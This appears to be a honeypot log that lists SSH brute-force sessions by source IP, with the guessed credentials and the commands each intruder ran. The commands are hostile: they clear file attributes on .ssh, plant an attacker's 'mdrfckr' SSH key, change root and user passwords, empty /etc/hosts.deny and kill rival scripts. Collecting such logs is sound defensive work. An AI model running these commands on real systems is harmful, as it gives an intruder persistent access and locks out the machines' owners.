$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 bistro (195.154.176.37) β€” Paris, France Β· 1 session Β· 20 cmds
2026-05-31 20:03 EDT Β· as anna/password
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "password\n6vjhJg8RV4R3\n6vjhJg8RV4R3"|passwd|bash
$ Enter new UNIX password:
$ echo "password\n6vjhJg8RV4R3\n6vjhJg8RV4R3\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 stroopwafel (46.8.68.144) β€” Amsterdam, Netherlands Β· 1 session Β· 20 cmds
2026-05-31 20:02 EDT Β· as dmdba/123456
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\npSa8zmnTCqTT\npSa8zmnTCqTT"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\npSa8zmnTCqTT\npSa8zmnTCqTT\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 crepe_root_8 (51.178.114.78) β€” Gravelines, France Β· 2 sessions Β· 40 cmds
2026-05-14 11:08 EDT Β· as pakchoi/Kermit123@, upload/upload
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "upload\n5Vc4L1Z73gmr\n5Vc4L1Z73gmr"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "upload\n5Vc4L1Z73gmr\n5Vc4L1Z73gmr\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "Kermit123@\nA00Y61GRpU6h\nA00Y61GRpU6h"|passwd|bash
$ echo "Kermit123@\nA00Y61GRpU6h\nA00Y61GRpU6h\n"|passwd
🎭 strudel_root_6 (161.35.65.86) β€” Frankfurt am Main, Germany Β· 1 session Β· 19 cmds
2026-05-31 20:01 EDT Β· as root/Jkl123456
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:lbS7Zauqq1VH"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 clog (34.91.0.68) β€” Groningen, Netherlands Β· 1 session Β· 20 cmds
2026-05-31 20:01 EDT Β· as upload/upload
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "upload\niX0qd85EhwBh\niX0qd85EhwBh"|passwd|bash
$ Enter new UNIX password:
$ echo "upload\niX0qd85EhwBh\niX0qd85EhwBh\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_44 (165.154.236.104) β€” Singapore, Singapore Β· 2 sessions Β· 40 cmds
2026-05-31 19:43 EDT Β· as erick/erick, paul/paul
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "paul\n63iD9HPAAHTw\n63iD9HPAAHTw"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "paul\n63iD9HPAAHTw\n63iD9HPAAHTw\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "erick\nGPvmy8tCvanU\nGPvmy8tCvanU"|passwd|bash
$ echo "erick\nGPvmy8tCvanU\nGPvmy8tCvanU\n"|passwd
🎭 wraith_root_42 (171.244.37.103) β€” Hanoi, Vietnam Β· 1 session Β· 20 cmds
2026-05-31 19:46 EDT Β· as paul/paul
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "paul\nPDjTOL4vFent\nPDjTOL4vFent"|passwd|bash
$ Enter new UNIX password:
$ echo "paul\nPDjTOL4vFent\nPDjTOL4vFent\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_44 (193.47.42.252) β€” Minsk, Belarus Β· 1 session Β· 19 cmds
2026-05-31 19:36 EDT Β· as root/1234qwer!
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:0HDiW5k4sc54"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_45 (89.167.67.234) β€” Helsinki, Finland Β· 1 session Β· 20 cmds
2026-05-31 19:34 EDT Β· as ubuntu/1234qwer
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1234qwer\n9JA2QSshvGao\n9JA2QSshvGao"|passwd|bash
$ Enter new UNIX password:
$ echo "1234qwer\n9JA2QSshvGao\n9JA2QSshvGao\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_39 (180.243.255.99) β€” Tasikmalaya, Indonesia Β· 1 session Β· 20 cmds
2026-05-31 19:15 EDT Β· as eprints/eprints
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "eprints\nFxkPUAgl1R6x\nFxkPUAgl1R6x"|passwd|bash
$ Enter new UNIX password:
$ echo "eprints\nFxkPUAgl1R6x\nFxkPUAgl1R6x\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_39 (81.193.216.17) β€” Madalena, Portugal Β· 2 sessions Β· 38 cmds
2026-05-18 05:36 EDT Β· as root/Passw0rd@123, root/manager1
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:BTDMbOLxvICs"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:rtat7k5Sod8O"|chpasswd|bash
🎭 seoul_root_11 (222.232.176.7) β€” Dong-gu, South Korea Β· 1 session Β· 19 cmds
2026-05-31 18:42 EDT Β· as root/Passw0rd@123
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Jua8qyyIBL5s"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 fika_root_3 (171.25.158.74) β€” Vaxjo, Sweden Β· 1 session Β· 19 cmds
2026-05-31 18:14 EDT Β· as root/Aa1234567890
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:kihAJSyaOwDN"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_45 (152.32.220.188) β€” Singapore, Singapore Β· 2 sessions Β· 4 cmds
2026-05-31 16:38 EDT Β· as administrator/123, intern/intern
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 specter_root_46 (186.38.26.5) β€” Sierra Grande, Argentina Β· 1 session Β· 2 cmds
2026-05-31 16:32 EDT Β· as intern/intern
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
